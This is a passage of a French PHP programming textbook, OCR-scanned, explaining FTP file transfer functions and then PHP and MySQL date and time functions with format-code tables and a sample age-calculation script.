appel a une fonction de fichier. En effet, si ces dernieres peuvent aisement lire et, dans 
certains cas, ecrire des fichiers sur les interfaces reseau, la plupart des fonctions d'etat 
comme f ilemtime( ) ne fonctionnent pas a distance. 

Pour savoir si vous devez telecharger un fichier, commencez par verifier qu'il existe une 
copie locale du fichier, au moyen de la fonction file exists ( ). Si ce n'est pas le cas, 
le telechargement du fichier est bien sur indispensable. Si une copie locale existe, le 
code determine la date de derniere modification du fichier via la fonction f ilemtime( ) 
et l'enregistre dans la variable $date locale. Si le fichier n'existe pas, la variable 
$date locale est initialisee a 0, afin d'etre systematiquement anterieure a la date du 
fichier distant : 
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echo 'Verification de la date du f ichier. . .<br />'; 
if (f ile_exists ($f ichier_local) ) { 

$date_locale = filemtime($fichier_local) ; 

echo ' Le f ichier local a ete modifie le '; 

echo date('G:i j-M-Y', $date_locale) ; 

echo ' <br /> ' ; 
} else { 

$date_locale = 0; 

} 

Pour plus d' informations sur les fonctions file exists () et filemtime(), reportez- 
vous aux Chapitres 2 et 17. 

Lorsque la date du fichier local a ete determinee, on teste celle du fichier distant a l'aide 
de la fonction ftp mdtm ( ) : 

$date_distante = ftp_mdtm($conn, $date_distante) ; 
Cette fonction prend deux parametres : le descripteur de la connexion FTP et le chemin 
d'acces au fichier distant a tester. Elle renvoie soit la date Unix donnant la date de 
derniere modification, soit 1 en cas d'erreur. Certains serveurs FTP ne prenant pas en 
charge cette fonctionnalite, cette fonction renvoie parfois un resultat inutilisable. Dans 
cette situation, le script ajuste artificiellement la variable $date distante de telle sorte 
qu'elle soit toujours posterieure a la valeur de $date locale, en lui ajoutant 1. Cette 
astuce permet de s'assurer qu'une tentative de telechargement aura bien lieu : 

if ( ! ($date_distante >= 0)) { 

// Cela ne signifie pas que le fichier n'est pas present ; 

// Le serveur ne prend peut-etre pas en charge la datation des 

// dernieres modifications 

echo "Impossible de determiner la date du fichier distant. <br>" ; 
$date_distante = $date_locale +1; // Force la mise a jour 
} else { 

echo ' Le fichier distant a ete modifie le '; 
echo date('G:i j-M-Y', $date_distante) ; 
echo ' <br> ' ; 

} 

Lorsque les deux dates sont connues, leur comparaison permet de determiner s'il est 
necessaire de proceder au telechargement du fichier : 

if ( ! ($date_distante > $date_locale) ) { 
echo 'La copie locale est a jour.<br>'; 
exit; 

} 

Telechargement du fichier 

Cette quatrieme etape consiste a tenter le telechargement du fichier a partir du serveur : 

echo 'Chargement du fichier a partir du serveur ... <br />'; 
$fp = fopen ($f ichier_local, 'w'); 

if (!$succes = ftp_fget($conn, $fp, $fichier_distant, FTP_BINARY) ) { 
echo 'Erreur : Impossible de telecharger le fichier.'; 
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ftp_quit($conn) ; 
exit ; 

} 

f close($f p) ; 

echo ' Le telechargement du fichier a reussi. ' ; 

Comme nous l'avons vu precedemment, nous procedons a l'ouverture d'un fichier local 
avec fopen( ). Puis nous appelons la fonction ftp fget( ), qui tente de telecharger le 
fichier et d'enregistrer son contenu dans un fichier local. La fonction ftp f get ( ) prend 
quatre parametres. Les trois premiers sont evidents : le descripteur de la connexion 
FTP, le descripteur du fichier local et le chemin d'acces au fichier distant. Le quatrieme 
parametre est le mode FTP. 

Un transfert FTP peut s'operer selon deux modes : ASCII ou binaire. Le mode ASCII 
s'utilise pour le transfert de fichiers texte (c'est-a-dire de fichiers ne comprenant que 
des caracteres ASCII), tandis que le mode binaire s'emploie pour tous les autres trans- 
ferts. Le mode binaire transfere les fichiers sans les modifier, alors que le mode ASCII 
traduit les retours chariot et les sauts de ligne en les remplacant par les caracteres appropries 
pour votre systeme ( \ n pour Unix et \ r \ n pour Windows). 

La bibliotheque FTP de PHP fournit deux constantes predefinies, FTP ASCII et 
FTP BINARY, qui represented ces deux modes. On choisit done le mode approprie pour 
le type de fichier a telecharger, puis on passe la constante correspondante comme 
quatrieme parametre de la fonction ftp fget(). Ici, le fichier transfere etant de type 
ZIP, on utilise la constante FTP BINARY. 

La fonction ftp fget() renvoie la valeur true si le telechargement s'est bien passe, 
false sinon. Ici, nous enregistrons le resultat de ftp fget() dans la variable $succes 
que Ton teste ensuite pour informer l'utilisateur du succes ou de l'echec de l'operation. 

Une fois que le telechargement est termine, le fichier local est ferine au moyen de la 
fonction fclose(). 

Au lieu d'utiliser la fonction ftp fget(), nous aurions pu employer la fonction 
ftp get ( ) , dont le prototype est le suivant : 

int ftp_get (int connexion_ftp , string chemin_fichier_local, 
string chemin_fichier_distant, int mode) 

Cette fonction ressemble a ftp f get ( ) , sauf qu'elle n'exige pas que le fichier local soit 
ouvert. II suffit de lui passer le nom du fichier local dans lequel vous voulez ecrire, au 
lieu d'un descripteur de fichier. 

Notez que PHP n'offre pas d'equivalent de la commande FTP mget, qui permet de tele- 
charger plusieurs fichiers a la fois. Pour implementer des telechargements multiples 
dans un script PHP, il faut proceder a plusieurs appels de la fonction ftp f get ( ) ou de 
la fonction ftp get(). 



Chapitre 18 



Utilisation des fonctions de reseau et de protocole 457 



Fermeture d'une connexion 

Une fois que le telechargement via la connexion FTP est termine, la connexion doit etre 
fermee au moyen de la fonction ftp quit( ), en passant a celle-ci le descripteur de la 
connexion FTP : 

ftp_quit ($conn) ; 

Telechargement de f ichiers vers un serveur 

Les fonctions ftp f put ( ) et ftp put ( ) permettent d'effectuer le transfert inverse de celui 
que nous venons de presenter, c'est-a-dire depuis votre serveur jusqu'a un note distant. Ces 
fonctions sont les inverses de ftp f get ( ) et ftp get ( ) et ont les prototypes suivants : 

int ftp_fput (int connexion_ftp , string chemin_fichier_distant, int fp, int 
mode) 

int ftp_put (int connexion_ftp , string chemin_fichier_distant, 
string chemin_fichier_local, int mode) 

Leurs parametres sont identiques a ceux des fonctions get equivalentes. 
Eviter les depassements de delai 

Le depassement du temps maximal d'execution est un probleme courant dans les trans- 
ferts de fichiers par FTP Lorsqu'une telle situation se produit, l'interpreteur PHP 
genere un message d'erreur qui informe de la nature du probleme rencontre. 

La valeur par defaut du temps maximal d'execution pour tous les scripts PHP est defmie 
dans le fichier de configuration php.ini. Par defaut, il est fixe a 30 secondes. Ce parame- 
trage de PHP a pour but d'arreter les scripts qui s'emballent. Toutefois, lors de la mise en 
ceuvre de transferts FTP, les transferts peuvent aisement depasser cette duree pour peu que 
le lien etabli avec le reste du monde soit lent ou que le fichier soit de grande taille. 

II est heureusement possible de modifier le temps maximal d'execution pour un script 
particulier, en utilisant la fonction set time limit ( ) . L'appel de cette fonction provoque 
la reinitialisation du nombre maximal de secondes pendant lequel le script est autorise a 
s'executer, a partir du moment de l'appel de la fonction. Par exemple, la ligne de code : 

set_time_limit(90) ; 

donne au script 90 secondes supplementaires a partir du moment ou cette ligne est 
executee. 

Autres fonctions FTP 

Le langage PHP offre plusieurs autres fonctions FTP tres utiles. La fonction 
ftp size( ) permet de connaitre la taille d'un fichier enregistre sur un serveur distant. 
Son prototype est le suivant : 

int ftp_size(int connexion_ftp , string chemin_fichier_distant) 



458 Partie IV 



Techniques PHP avancees 



Cette fonction renvoie la taille en octets du fichier distant qui lui est passe comme 
deuxieme parametre, ou 1 en cas d'erreur. Elle n'est pas prise en charge par tous les 
serveurs FTP. 

La fonction ftp size( ) peut se reveler tres pratique lorsqu'il s'agit de fixer le temps 
d'execution maximal d'un transfert particulier. Si la taille du fichier a telecharger et la 
vitesse de la connexion sont connues, il est possible d'estimer la duree du transfert et 
d'utiliser en consequence la fonction set time limit ( ). 

Le code qui suit permet, par exemple, d'obtenir et d'afficher la liste des fichiers enregistres 
dans l'un des repertoires d'un serveur FTP distant : 

$listing = f tp_nlist ($conn , dirname($f ichier_distant) ) ; 
foreach ($listing as $nomfic) 
echo "$nomf ic <br>" ; 

On utilise ici la fonction ftp nlist ( ) pour obtenir la liste des fichiers contenus dans un 
repertoire particulier. 

PHP offre des fonctions permettant d'accomplir presque toutes les operations realisa- 
bles sur la ligne de commande FTP. Vous trouverez les fonctions PHP correspondant 
aux differentes commandes FTP dans le manuel PHP en ligne, a l'URL http:// 
no.php.net/manual/fr/ref.ftp.php. 

Seule la commande mget n'a pas d'equivalent en PHP, mais vous pouvez utiliser 
ftp nlist ( ) pour obtenir la liste des fichiers puis recuperer ceux qui vous interessent. 

Pour aller plus loin 

Ce chapitre a presente de nombreuses notions pour lesquelles, comme d' habitude, vous 
trouverez beaucoup de ressources. Pour en savoir plus sur les differents protocoles, 
consultez les RFC sur le site http://www.rfc-editor.org/. 

Vous trouverez egalement des informations interessantes relatives aux protocoles 
reseau sur le site du WWWC (World Wide Web Consortium), http://www.w3.org/ 
Protocols/. 

Vous pouvez en outre consulter un des nombreux ouvrages traitant de TCP/IP, comme 
Reseaux d'Andrew Tanenbaum (publie par les editions Pearson). 

Pour la suite 

Dans le chapitre suivant, nous etudierons les bibliotheques de fonctions de date et de 
calendrier. Nous verrons comment passer des formats entres par l'utilisateur aux 
formats PHP, puis aux formats MySQL et inversement. 
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Dans ce chapitre, nous verrons comment verifier et formater la date et l'heure. Nous 
nous interesserons egalement a la conversion entre les differents formats de date. Ces 
operations revetent en effet une importance particuliere lorsqu'il s'agit de realiser la 
conversion entre les formats de date PHP, MySQL, Unix ainsi que ceux utilises pour les 
dates saisies par les utilisateurs dans les formulaires HTML. 

Obtention de la date et de l'heure a partir d'un script PHP 

Au Chapitre 1, nous avons utilise la fonction date( ) pour obtenir et formater la date et 
l'heure dans un script PHP. Nous allons a present revenir plus en detail sur cette fonction, 
ainsi que sur les autres fonctions de date et d'heure offertes par PHP. 

Utilisation de la fonction date() 

La fonction date( ) prend deux parametres, dont l'un est facultatif. Le premier est une 
chaine de format tandis que le second, facultatif, est une etiquette temporelle Unix. En 
son absence, la fonction date() utilise par defaut la date et l'heure courantes. Elle 
renvoie une chaine formatee representant la date appropriee. 

Un appel de la fonction date ( ) se formule typiquement de la maniere suivante : 

echo date( ' j FY 1 ); 
Cette ligne de code produit une date au format suivant : "19 June 2008". 
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Les codes de format reconnus par la fonction date() sont enumeres dans le 
Tableau 19.1. 

Tableau 19.1 : Codes de format de la fonction PHP dateQ 

Code Description 

a Matin ou apres-midi, represente sous la forme de deux caracteres en 

minuscules : respectivement am et pm. 

A Matin ou apres-midi, represente sous la forme de deux caracteres en 

majuscules : respectivement AM et PM. 

B Heure Internet Swatch, qui constitue un systeme de temps universel. Pour plus 

d'informations a ce sujet, visitez le site http://www.swatch.com/. 

c Date ISO 8601 . Les dates sont representees sous la forme AAAA-MM-JJ. Un T 

majuscule separe la date de l'heure. L'heure est representee au format 
HH:MM:SS. Enfin, le fuseau horaire est represente sous la forme d'un decalage 
par rapport au temps de Greenwich (GMT) - par exemple, 2008 06 
26T21 : 04 : 42+1 1 : 00 (ce code de format a ete ajoute dans PHP 5). 

d Jour du mois, sous la forme d'un nombre a deux chiffres, eventuellement prefixe 

par un zero. La plage autorisee s'etend de 01 a 31 . 

D Jour de la semaine en anglais, dans un format textuel abrege en trois lettres. La 

plage s'etend de Mon (lundi) a Sun (dimanche). 

e Identifiant de la zone horaire (disponible a partir de PHP 5.1 .0). 

F Mois de l'annee en anglais, au format textuel, version longue. La plage autorisee 

va de January a December. 

g Heure du jour, exprimee dans le systeme a 12 heures, sans zero initial. La plage 

autorisee s'etend de 1 a 12. 

G Heure du jour, exprimee dans le systeme a 24 heures, sans zero initial. La plage 

autorisee s'etend de a 23. 

h Heure du jour, exprimee dans le systeme a 12 heures, prefixee eventuellement 

par zero. La plage autorisee s'etend de 01 a 1 2. 

H Heure du jour, exprimee dans le systeme a 24 heures, prefixee eventuellement 

par zero. La plage autorisee s'etend de 00 a 23. 

i Minutes, si necessaire prefixees avec un zero. La plage autorisee s'etend de 00 a 

59. 

I (i Indique si le systeme horaire courant est celui de l'heure d'hiver ou de l'heure 

majuscule) d'ete, sous la forme d'une valeur booleenne : 1 si l'heure d'hiver est activee, 
sinon 0. 
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Tableau 19.1 : Codes de format de la fonction PHP dateQ (suite) 



Code Description 

j Jour du mois au format numerique, sans zero en prefixe. La plage autorisee 

s'etend de 1 a 31 . 

1 (L Jour de la semaine en anglais, au format textuel, version longue. La plage 

minuscule) autorisee s'etend de Sunday a Saturday. 

L Indique si l'annee est bissextile, par une valeur booleenne : 1 dans le cas d'une 

annee bissextile, et pour les annees non bissextiles. 

m Mois de l'annee, sous la forme d'un nombre a deux chiffres, eventuellement 

prefixe par un zero. La plage autorisee s'etend de 01 a 1 2. 

M Mois de l'annee en anglais, dans un format textuel abrege en trois lettres. La 

plage autorisee s'etend de Jan a Dec. 

n Mois de l'annee, sous la forme d'un nombre sans zero en prefixe. La plage 

autorisee s'etend de 1 a 12. 

o Annee au format ISO-8601 (disponible a partir de PHP 5.1 .0). 

Difference entre la zone horaire courante et I'heure GMT exprimee en heures 

(par exemple +1 600). 

r La date et I'heure exprimees dans le format de la RFC822, par exemple Wed , 1 

Jul 2008 18:45:30 +1600. 

s Secondes, eventuellement prefixees par zero. La plage autorisee s'etend de 00 a 

59. 

S Suffixe ordinal pour les dates anglaises, sur deux lettres. Ce suffixe peut etre st, 

nd, rd ou th selon le nombre qui le precede. 

t Nombre total de jours dans le mois donne. La plage autorisee s'etend de 28 a 31 . 

T Fuseau horaire du serveur, sous la forme de trois lettres, par exemple EST. 

U Nombre total de secondes ecoulees depuis le l el janvier 1970 (epoch Unix) 

jusqu'au moment considere. 

w Jour de la semaine sur un seul chiffre. La plage autorisee s'etend de 

(dimanche) a 6 (samedi). 

W Numero de la semaine dans l'annee, conforme a ISO-8601. 

y Annee exprimee sur 2 chiffres, par exemple 08. 

Y Annee exprimee sur 4 chiffres, par exemple 2008. 

z Numero du jour dans l'annee. La plage autorisee s'etend de a 365. 

Z Decalage horaire en secondes. La plage autorisee s'etend de 43200 a 43200. 
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Utilisation des etiquettes temporelles Unix 

Le second parametre facultatif passe a la fonction date( ) est une etiquette temporelle 
Unix. 

La plupart des systemes Unix enregistrent la date et l'heure courantes sous la forme 
d'un entier sur 32 bits contenant le nombre de secondes ecoulees depuis minuit, le l er 
janvier 1970 GMT. Cet instant tres precis est parfois designe par le terme d' epoch Unix. 
Bien que cette notion puisse apparaitre un peu esoterique au non-initie, c'est un standard et 
les entiers sont simples a gerer pour les ordinateurs. 

Les etiquettes Unix constituent un moyen compact pour stacker la date et l'heure. 
Par rapport aux autres formats de date compactes ou abreges, elles ont l'avantage de 
ne pas souffrir du "bogue de l'an 2000". Elles ont cependant un probleme similaire 
puisqu'on ne peut representer qu'un intervalle de temps limite avec un entier sur 
32 bits. 

Sur certains systemes, dont Windows, l'intervalle est plus limite. Les etiquettes ne 
pouvant pas etre negatives, vous ne pouvez pas remonter avant 1970. Pour que votre 
code reste portable, vous devez garder ce point a 1' esprit. 

Cela dit, vous n'aurez probablement pas besoin de l'echeance de 2038. En effet, les 
etiquettes ne possedent pas une taille fixe puisqu'elles sont liees a la taille d'un entier 
long du langage C, qui fait au moins 32 bits. Si votre logiciel devait encore etre utilise 
en 2038, il y a de fortes chances pour qu'a cette date votre systeme utilise plus de bits 
pour representer ce type. 

Bien qu'il s'agisse toujours d'une convention Unix, ce format est toujours utilise par 
date() et un certain nombre d'autres fonctions PHP, meme si vous utilisez 
Windows. La seule difference tient au fait que, pour Windows, l'etiquette doit etre 
positive. 

Pour convertir une date et une heure en une etiquette temporelle Unix, utilisez la fonction 
mktime ( ) , dont le prototype est le suivant : 

int mktime ([int heure[ , int minute[ , int seconde[ , int mois[, 
int jour[, int annee [, int is_dst] ]]]]]] ) 

Les noms utilises ici pour representer les differents parametres sont explicites, a 
l'exception du dernier parametre, is dst. Celui-ci indique si le systeme en vigueur est 
celui de l'heure d'hiver (1 ), de l'heure d'ete (0), ou s'il n'est pas connu ( 1 , la valeur par 
defaut). Dans ce dernier cas, PHP tentera de determiner si l'heure d'hiver est activee en 
utilisant les informations du systeme sur lequel il s'execute. Ce parametre est facultatif 
et n'est que rarement utilise. 

L'ordre des parametres de la fonction mktime ( ) n'est pas intuitif et constitue parfois un 
piege pour le programmeur PHP. Si l'heure n'a pas d' importance dans le contexte de 
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votre application, vous pouvez passer la valeur pour chacun des trois premiers para- 
metres. Vous pouvez aussi ne pas preciser les parametres places a droite, auquel cas 
l'interpreteur PHP utilisera automatiquement les valeurs courantes. Ainsi, l'appel 
suivant : 

$etiquette = mktime(); 

renvoie l'etiquette temporelle Unix correspondant a la date et a I'heure courantes. 
Le meme resultat serait obtenu avec la ligne de code suivante : 

$etiquette = time( ) ; 

La fonction time ( ) ne prend pas de parametre et renvoie toujours l'etiquette Unix pour 
la date et I'heure courantes. 

Comme nous l'avons indique, vous pouvez egalement utiliser la fonction date(). La 
chame de format "U" lui demande en effet de renvoyer une etiquette temporelle. 
L' instruction suivante equivaut done aux precedentes : 

$etiquette = date( "U" ) ; 

La fonction mkime ( ) accepte aussi bien des annees sur 2 chiffres que sur 4 chiffres. Les 
valeurs a deux chiffres comprises entre et 69 sont automatiquement interpretees 
comme les annees 2000 a 2069, tandis que les valeurs comprises entre 70 et 99 sont 
interpretees comme les annees 1970 a 1999. 

Voici quelques autres exemples illustrant l'utilisation de mktime( ) : 

$etiquette = mktime(12, 0, 0); 
renvoie midi de la date courante. 

$etiquette = mktime(0,0,0, 1 , 1 ) ; 

donne le l er janvier de l'annee courante. Vous remarquerez que minuit est represents 
par 0, pas par 24. 

Vous pouvez egalement utiliser mktime() pour 1' arithmetique simple des dates. Par 
exemple : 

$etiquette = mktime(12, 0, 0, $mois, $jour+30, $annee); 

ajoute 30 jours a la date indiquee dans les composants, bien que ($jour + 30) soit 
generalement plus grand que le nombre de jours dans le mois correspondant. 

Pour eliminer certains problemes relatifs aux changements d'horaire, utilisez 12 au lieu 
de 0. Si vous ajoutez (24 * 60 * 60) a minuit lors d'une journee de 25 heures, vous 
resterez au meme jour. Ajoutez le meme nombre a midi et vous obtiendrez 1 1 heures du 
matin, mais vous serez au moins le bon jour. 
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Utilisation de la fonction getdate() 

La fonction getdate ( ) est une autre fonction sur les dates qui peut egalement se reveler 
tres utile. Elle a le prototype suivant : 

array getdate ([int etiquette]) 

La fonction getdate () prend une etiquette temporeile en parametre et renvoie un 
tableau associatif contenant les differentes parties de cette etiquette en suivant le 
schema decrit dans le Tableau 19.2. 



Tableau 19.2 : Le tableau associatif retourne par la fonction getdateQ 



Cle 


Valeur 


seconds 


Secondes, numerique 


minutes 


Minutes, numerique 


hours 


Heures, numerique 


mday 


Jour du mois, numerique 


wday 


Jour de la semaine, numerique 


mon 


Mois, numerique 


year 


Annee, numerique 


yday 


Jour de 1' annee, numerique 


weekday 


Jour de la semaine, format texte 


month 


Mois, format texte 





Etiquette temporeile, numerique 



Une fois ces parties placees dans un tableau, vous pouvez aisement les traiter dans 
n'importe quel format requis. L' element dans le tableau (l'etiquette temporeile) peut 
paraitre inutile, mais, si vous appelez getdate () sans parametre, il vous permettra 
d'obtenir l'etiquette temporeile correspondant a l'instant present. 

Avec getdate ( ), le code suivant : 
<?php 

$maintenant = getdate(); 
print_r($maintenant) ; 

?> 

produira un affichage comme celui-ci : 

Array 
( 

[seconds] => 57 
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[minutes] => 55 
[hours] => 15 
[mday] => 15 
[wday] => 1 
[mon] => 9 
[year] => 2008 
[yday] => 258 
[weekday] => Monday 
[month] => September 
[0] => 1221486957 

) 

Validation de dates avec checkdateQ 

La fonction checkdate( ) permet de s'assurer de la validite d'une date. Elle se revele 
particulierement utile pour verifier les dates saisies par l'utilisateur. Son prototype est le 
suivant : 

int checkdate (int mois, int jour, int annee) 

La fonction checkdate () determine si l'annee est bien un entier compris entre et 
32767, si le mois est un entier compris entre 1 et 1 2 et si le jour passe en parametre 
existe bien dans ce mois particulier. Elle tient compte des annees bissextiles. 

Par exemple : 

checkdate(2, 29, 2008); 
renvoie true, tandis que : 

checkdate(2, 29, 2007) 
renvoie false. 

Formatage des etiquettes temporelles 

La fonction strftime() permet de formater une etiquette temporeile en utilisant la 
locale du systeme. Son prototype est le suivant : 

string strftime ( string $format [, int $etiquette] ) 

Le parametre $format precise la facon dont $etiquette sera formatee. Si vous ne 
passez pas d' etiquette temporeile en parametre, c'est celle du systeme au moment de 
l'execution du script qui sera prise en compte. Le code suivant, par exemple : 

<?php 

echo strftime( '%A<br />'); 

echo strftime( '%x<br />'); 

echo strftime( '%c<br />'); 

echo strftime( '%Y<br />'); 
?> 



466 Partie IV 



Techniques PHP avancees 



affiche 1' instant present dans quatre formats differents : 

Monday 
09/15/08 

Mon Sep 15 16:06:19 2008 
2008 

Le Tableau 19.3 donne la liste complete des specificateurs de formats reconnus par 
strf time( ). 



Tableau 19.3 : Specificateurs de formats de strftimef) 



Code Description 

%a Jour de la semaine abrege 

%A Jour de la semaine 

%b ou %h Mois abrege 

%B Mois 

%c Date et heure au format standard 

%C Siecle 

%d Jour du mois (de 01 a 31) 

%D Date au format abrege (mm/jj/aa) 

%e Jour du mois sous forme d'une chaine de deux caracteres (de ' 1 ' a ' 31 ' ) 

%g Annee en fonction du numero de semaine, sur deux chiffres 

%G Annee en fonction du numero de semaine, sur quatre chiffres 

%H Heure (de 00 a 23) 

%I Heure (de 1 a 12) 

%j Jour dans l'annee (de 001 a 366) 

%m Numero du mois (de 01 a 12) 

%M Minutes (de 00 a 59) 

%n Nouvelle ligne (\n) 

%p am ou pm (ou 1' equivalent local) 

%r Heure utilisant la notation am/pm 

%R Heure utilisant la notation sur 24 heures 

%S Secondes (de 00 a 59) 
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Tableau 19.3 : Specif icateurs de formats de strftimef) (suite) 



Code Description 

%t Tabulation (\t) 

%T Heure au format hh : ss : mm 

%u Jour de la semaine (de 1 - lundi a 7 - dimanche) 

%U Numero de la semaine (le premier dimanche de l'annee est le premier jour de 

la premiere semaine) 

%V Numero de la semaine (la premiere semaine de l'annee ayant au moins 4 jours 

est comptee comme semaine 1) 

%w Jour de la semaine (de - dimanche - a 6 - samedi) 

%W Numero de la semaine (le premier lundi de l'annee est le premier jour de la 

premiere semaine) 

%x Date au format standard (sans I'heure) 

%X Heure au format standard (sans la date) 

%y Annee sur deux chiffres 

%Y Annee sur quatre chiffres 

%z_ou %Z Zone horaire 



II faut bien noter que les termes format standard utilises dans ce tableau indiquent que 
le format sera celui de la locale du serveur web. La fonction strf time( ) est done tres 
pratique pour afficher des dates et des heures dans des formats qui rendront vos pages 
plus attrayantes. 

Conversion entre des formats de date PHP et MySQL 

Les formats de date et d'heure de MySQL sont au format ISO 8601. Si les heures sont 
pour l'essentiel exprimees comme a l'accoutumee, le format ISO 8601 exige que les 
dates commencent par l'annee. Le 29 mars 2008 doit done etre saisi sous la forme 
2008 03 29 ou 08 03 29. Par defaut, les dates que vous obtiendrez de MySQL seront 
egalement donnees sous cette forme. 

Pour certains utilisateurs de vos scripts, ce format peut ne pas etre le plus adapte. Pour 
communiquer entre PHP et MySQL, vous devrez done eventuellement effectuer quelques 
conversions de dates. Cette operation peut intervenir a l'une ou 1' autre extremite. 
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Pour ecrire des dates dans MySQL a partir de PHP, vous pouvez aisement obtenir le 
format voulu en appelant la fonction date(), comme on l'a vu precedemment. II faut 
toutefois faire attention, lorsque vous les creez depuis votre propre code, a utiliser les 
formats de jour et de mois justifies a gauche avec des zeros en tete, de maniere a eviter 
toute confusion dans MySQL. Vous pouvez utiliser une annee sur deux chiffres, mais il 
est generalement preferable d' utiliser des annees a quatre chiffres. Si vous souhaitez 
convertir les dates ou les heures dans MySQL, vous disposez de deux fonctions : 
DATE FORMAT () et UNIX TIMESTAMP ( ) . 

La premiere est semblable a la fonction date ( ) de PHP, si ce n'est qu'elle utilise des codes 
de format differents. La conversion la plus courante consiste a exprimer une date au format 
francais (JJ-MM-AAAA), plutot qu'au format ISO (AAAA-MM-JJ) en vigueur dans 
MySQL. Cette conversion s'effectue simplement au moyen de la requete suivante : 

SELECT DATE_FORMAT (colonne_date , '%d %m %Y') 
FROM nomtable; 

Le code de format %d represente le jour sous la forme d'un nombre a deux chiffres, %m 
correspond a une representation du mois sous la forme d'un nombre a deux chiffres 
et %Y represente 1' annee sous la forme d'un nombre a quatre chiffres. Les codes de 
format MySQL les plus utiles pour ce type de conversion sont decrits dans le 
Tableau 19.4. 



Tableau 19.4 : Codes de format pour la fonction MySQL DATE_FORMAT() 



Code 


Description 


%M 


Mois, texte brut 


%W 


Nom du jour de la semaine, texte brut 


%D 


Jour du mois, numerique, avec un suffixe textuel (par exemple 1st) 


%Y 


Annee exprimee sur 4 chiffres 


%y 


Annee exprimee sur 2 chiffres 


%a 


Nom du jour de la semaine sur 3 lettres 


%d 


Jour du mois exprime sous forme numerique et justifie a gauche avec un zero 


%e 


Jour du mois exprime sous forme numerique et sans justification a gauche avec un 




zero 


%m 


Mois exprime sous forme numerique justifie a gauche avec un zero 


%c 


Mois exprime sous forme numerique sans justification a gauche avec un zero 


%b 


Mois au format texte, sur 3 lettres 
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Tableau 19.4 : Codes de format pour la fonction MySQL DATE_FORMAT() (suite) 



Code 




%i 
° j 


Tnnr Hp l'annpp sons formp nnmprinnp 

.ll'Lll V_IV_ 1 clllllLl.. JUUj IV.'l 111V. 


%H 


TTpnrp pxnrimpp sur 94- hpnrps pf instifipp a ^anrhp avpc nn 7Prn 

llLLll^ ^ A Ul 11 11L ^ Jill r HblllLJ ILlJllll^^ CI .^1111^.111* 1L V Llll 11 ' 


%k 


Heure exprimee sur 24 heures et sans justification a gauche avec un zero 


%h ou %I 


Heure exprimee sur 12 heures et justifiee a gauche avec un zero 


%1 


Hpurp pxnrimpp snr 19 hpnrps pt sans iustifiration a tyanchp avpp un 7pro 


%i 


lV^inntPQ PYnfimppc qoiiq fnrtnp numpriniip pf niQtifippc ^ cranpVip avpr un 7pt~o 

lVi.lllU.LC-o CALfllllltCA AVJUS HJllllC 1 J LI 1 1 1L 1 1L \X\. CI J US L111C-CS (X gdULllC aVCL Ull ZjCI U 


%r 


Heure exprimee sur 12 heures (hh:mm:ss[AM|PM]) 


%T 


Heure exprimee sur 24 heures (hh:mm:ss) 


%S OU %s 


Secondes exprimees sous forme numerique et justifiees a gauche avec un zero 


%p 


AM ou PM 


%w 


Jour de la semaine exprime sous forme numerique, de (dimanche) a 6 (samedi) 



La fonction UNIX TIMESTAMP est comparable, si ce n'est qu'elle convertit une colonne 
en une etiquette temporelle Unix. Par exemple : 

SELECT UNIX_TIMESTAMP (colonne_date) 
FROM nomtable; 

renvoie la date exprimee sous la forme d'une etiquette Unix. Vous pouvez ensuite la 
manipuler a votre gre dans un script PHP. 

Vous pouvez aisement realiser des calculs et des comparaisons de date avec une 
etiquette temporelle Unix, mais n'oubliez pas qu'elle ne peut generalement representer 
que des dates comprises entre 1902 et 2038, alors que le type date de MySQL possede 
une plage bien plus etendue. 

En regie generale, il est preferable d'utiliser une etiquette temporelle lorsque Ton veut 
effectuer des calculs de dates, tandis que le format de date standard s'emploie lorsqu'il 
s'agit simplement d'enregistrer ou d'afficher des dates. 

Calculs de dates avec PHP 

Pour determiner le laps de temps qui s'est ecoule entre deux dates dans un script PHP, 
le plus simple est de mesurer l'ecart sepai - ant deux etiquettes temporelles Unix. C'est ce 
que nous faisons dans le script du Listing 19.1. 
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Listing 19.1 : calc_age.php — Script determinant I'age d'une personne a partir de sa date 
de naissance 



<?php 

// Definition de la date sur laquelle sera fonde le calcul 
$jour = 18; 
$mois = 9; 
$annee = 1972; 

// La date de naissance doit etre exprimee sous la forme MM JJ et AA 

// Obtention de l'etiquette Unix correspondant a la date de naissance 

$naissance_unix = mktime (0, 0, 0, $mois, $jour, $annee) ; 

// Obtention de l'etiquette Unix correspondant a la date d ' aujourd ' hui 

$maintenant_unix = time(); 

// Calcul de la difference 

$age_unix = $maintenant_unix - $naissance_unix; 
// conversion des secondes en annees 
$age = f loor($age_unix / (365 * 24 * 60 * 60)); 
echo "Vous avez $age ans."; 
?> 



Dans le script du Listing 19.1, nous avons defini la date prise en compte dans le calcul 
de l'age. Dans une application reelle, il est vraisemblable que cette information serait 
plutot fournie par l'utilisateur, par le biais d'un formulaire HTML. 

Ce code commence par appeler la fonction mktime () pour obtenir les dates Unix 
correspondant a la date de naissance et a la date du jour : 

$naissance_unix = mktime (0, 0, 0, $mois, $jour, $annee); 
$maintenant_unix = mktime(); 

Une fois les deux dates au meme format, il suffit de calculer leur difference : 

$age_unix = $maintenant_unix - $naissance_unix; 

La seule partie un peu plus subtile de ce script est celle qui convertit la periode de temps 
calculee en une unite de mesure plus lisible pour les utilisateurs. Le resultat de la diffe- 
rence est non pas une etiquette temporelle Unix mais l'age exprime en secondes. Pour 
le convertir en annees, il suffit de le diviser par le nombre de secondes que compte une 
annee. Le resultat de cette division est ensuite arrondi au moyen de la fonction 
floor ( ) car on ne dit d'une personne qu'elle a 20 ans que lorsque sa vingtieme annee 
est revolue. 

$age = f loor($age_unix / (365 * 24 * 60 * 60)); 

Notez que cette approche presente 1' inconvenient d'etre limitee par la plage des dates 
d'Unix (generalement des entiers sur 32 bits). Cet exemple n'est en outre pas forcement 
le plus approprie puisqu'il ne fonctionnera pas sous Windows pour les personnes nees 
avant 1970. En outre, ce calcul n'est pas toujours precis, car il ne tient pas compte des 
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annees bissextiles et peut echouer si I'heure de minuit du jour d'anniversaire de la 
personne correspond a I'heure de changement d'horaire pour le fuseau horaire local. 

Calculs de dates avec MySQL 

PHP ne fournit pas beaucoup de fonctions de manipulation de dates. Bien evidemment, 
vous pouvez ecrire vos propres fonctions, mais il peut etre assez difficile de vous assu- 
rer que vous tenez compte des annees bissextiles et des heures d'hiver ou d'ete. L' autre 
solution consiste alors a telecharger les fonctions d'autres personnes. De nombreuses 
notes d'utilisateurs sont proposees dans le manuel PHP, mais seules un petit nombre 
d'entre elles sont fiables. 

L'une des possibilites qui ne paraitra pas immediatement evidente consiste a utiliser 
MySQL car il fournit une vaste gamme de fonctions de manipulation de date qui fonc- 
